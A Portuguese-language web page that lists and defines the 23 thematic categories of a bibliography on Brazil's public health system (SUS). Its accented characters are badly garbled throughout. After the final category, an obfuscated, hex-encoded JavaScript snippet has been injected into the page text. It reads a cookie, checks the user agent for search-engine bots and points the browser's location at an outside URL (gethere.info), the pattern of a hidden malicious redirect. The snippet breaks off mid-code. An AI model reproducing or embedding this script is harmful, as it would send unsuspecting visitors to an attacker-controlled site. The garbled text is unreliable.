Temas

A Bibliografia do SUS Ai?? organizada em 23 categorias temA?ticas de modo a abranger os diferentes assuntos discutidos na produAi??A?o cientAi??fica e tAi??cnica sobre o Sistema Asnico de SaA?de (SUS). A metodologia para a criaAi??A?o das categorias foi a constituiAi??A?o de um comitA? de especialistas da Faculdade de SaA?de PA?blica da Universidade de SA?o Paulo, que definiu as categorias e apA?s, realizou a validaAi??A?o das referidas categorias com especialistas com a realizaAi??A?o de uma sessA?o de grupo focal com especialistas do SUS.

As categorias sA?o:

Reforma SanitA?ria Brasileira
Ocorreu no final dos anos de 1970 e tinha como proposta a construAi??A?o de uma nova polAi??tica de saA?de efetivamente democrA?tica, tomando por base a equidade, a justiAi??a social, a descentralizaAi??A?o, universalizaAi??A?o e unificaAi??A?o, a qual foi consolidada pela ConstituiAi??A?o Federal de 1988 e a criaAi??A?o do SUS.

PrincAi??pios do SUS: universalidade, integralidade, equidade
AtenAi??A?o Ai?? saA?de por parte do sistema a todo e qualquer cidadA?o, compreensA?o integral do ser humano, todo cidadA?o Ai?? igual perante o SUS (respectivamente).

Base jurAi??dico-legal
Fundamentos jurAi??dicos e normativos do SUS tais como a ConstituiAi??A?o Federal 1988, Lei OrgA?nica da SaA?de ai??i?? Lei 8.080 / 90, Lei 8.142 / 90, Emenda Constitucional 29 / 2000, Pacto pela SaA?de 2006, Lei 141/ 2012.

JudicializaAi??A?o
Busca do JudiciA?rio como a A?ltima alternativa para obtenAi??A?o do medicamento ou tratamento ora negado pelo SUS.

Financiamento: fontes e receitas
Financiamento com recursos da UniA?o, prA?prios e de outras fontes suplementares de financiamento, todos devidamente contemplados no OrAi??amento da Seguridade Social.

Controle social e participaAi??A?o
Instrumento para promover a democratizaAi??A?o da saA?de e a participaAi??A?o social no SUS, Ai?? um princAi??pio doutrinA?rio.

ComunicaAi??A?o
Troca de informaAi??Ai??es e sentidos, o estabelecimento de vAi??nculos entre sujeitos diversos, montar e oferecer bancos de dados, veicular peAi??as publicitA?rias ou divulgaAi??A?o na mAi??dia.

RegulaAi??A?o
Macro-funAi??A?o de gestA?o do SUS que busca garantir maior efetividade Ai??s aAi??Ai??es desenvolvidas pelos sistemas de saA?de; aborda conceitos relativos Ai?? regulaAi??A?o assistencial, a polAi??tica de regulaAi??A?o vigente e aspectos tAi??cnico-operacionais para a implantaAi??A?o dos complexos reguladores.

Controle, avaliaAi??A?o e auditoria
Atividades de fiscalizaAi??A?o das atividades de gestA?o do SUS e o papel do Sistema Nacional de Auditoria.

RegionalizaAi??A?o
A populaAi??A?o deve estar vinculada a uma rede de serviAi??os hierarquizados, organizados por regiA?o com A?rea geogrA?fica definida. A oferta de serviAi??os deve ser planejada de acordo com os critAi??rios epidemiolA?gicos.

SaA?de suplementar
Todo atendimento privado de saA?de, realizado ou nA?o por meio de um convA?nio com um plano de saA?de.

AtenAi??A?o bA?sica e saA?de da famAi??lia
ImplantaAi??A?o de equipes multiprofissionais em unidades bA?sicas de saA?de. Estas equipes sA?o responsA?veis pelo acompanhamento de um nA?mero definido de famAi??lias, localizadas em uma A?rea geogrA?fica delimitada.

PromoAi??A?o da saA?de e intersetorialidade
AmpliaAi??A?o e a qualificaAi??A?o de aAi??Ai??es de promoAi??A?o da saA?de nos serviAi??os e na gestA?o do SUS; Intersetorialidade = VisA?o integrada dos problemas sociais e de suas soluAi??Ai??es.

GestA?o do trabalho: forma de gerir o trabalho no interior do SUS
ConcepAi??A?o na qual a participaAi??A?o do trabalhador Ai?? fundamental para a efetividade e eficiA?ncia do Sistema Asnico de SaA?de. Dessa forma, o trabalhador Ai?? percebido como sujeito e agente transformador de seu ambiente e nA?o apenas um mero recurso humano realizador de tarefas previamente estabelecidas pela administraAi??A?o local.

GestA?o administrativa e financeira: ferramentas gerenciais e administrativas
Os recursos financeiros do Sistema Asnico de SaA?de sA?o depositados em conta especial, em cada esfera de sua atuaAi??A?o, e movimentados sob fiscalizaAi??A?o dos respectivos Conselhos de SaA?de.

GestA?o da educaAi??A?o: formaAi??A?o de profissionais da saA?de e educaAi??A?o permanente
PolAi??ticas relativas Ai?? formaAi??A?o, ao desenvolvimento profissional e Ai?? educaAi??A?o permanente dos trabalhadores do SUS.

EducaAi??A?o popular
PropAi??e uma prA?tica polAi??tico-pedagA?gica que perpassa as aAi??Ai??es voltadas para a promoAi??A?o, proteAi??A?o e recuperaAi??A?o da saA?de, a partir do diA?logo entre a diversidade de saberes valorizando os saberes populares, a ancestralidade, o incentivo Ai?? produAi??A?o individual e coletiva de conhecimentos e a sua inserAi??A?o destes no SUS.

Redes de atenAi??A?o e produAi??A?o de cuidado
Arranjos organizativos de aAi??Ai??es e serviAi??os de saA?de, de diferentes densidades tecnolA?gicas que, integradas por meio de sistemas de apoio tAi??cnico, logAi??stico e de gestA?o, buscam garantir a integralidade do cuidado.

AssistA?ncia farmacA?utica e acesso a medicamentos
Garantia do acesso equitativo a medicamentos e insumos, para prevenAi??A?o, diagnA?stico, tratamento e controle de doenAi??as e agravos.

Sistemas de informaAi??A?o: bases e indicadores
Conjunto de sistemas de informaAi??A?o de abrangA?ncia nacional para prover funcionalidades Ai??s A?reas epidemiolA?gicas, ambulatoriais, hospitalares e administrativas.

ProteAi??A?o e vigilA?ncias
Tem por objetivo a observaAi??A?o e anA?lise permanentes da situaAi??A?o de saA?de da populaAi??A?o, em vigilA?ncias temos a epidemiolA?gica, sanitA?ria, do trabalhador, ambiental, de medicamentos.

CiA?ncia, tecnologia e inovaAi??A?o
Aspectos relacionados a ciA?ncia e tecnologia em saA?de com vistas a melhorar a efetividade de aAi??Ai??es e serviAi??os em saA?de (estudos, pesquisas, produAi??A?o de conhecimentos e definiAi??A?o de linhas de pesquisa no SUS, e incorporaAi??A?o de novas tecnologias no SUS). Contempla aspectos relacionados com produtos, insumos, polAi??ticas e programas de gestA?o de tecnologia e inovaAi??A?o, assim como a PolAi??tica Nacional de CiA?ncia e Tecnologia e InovaAi??A?o em SaA?de.

SUS em comparaAi??A?o com outros sistemas de saA?de pelo mundo
AnA?lise e comparaAi??A?o da conformaAi??A?o dos sistemas nacionais de saA?de do Brasil e de outros paAi??ses.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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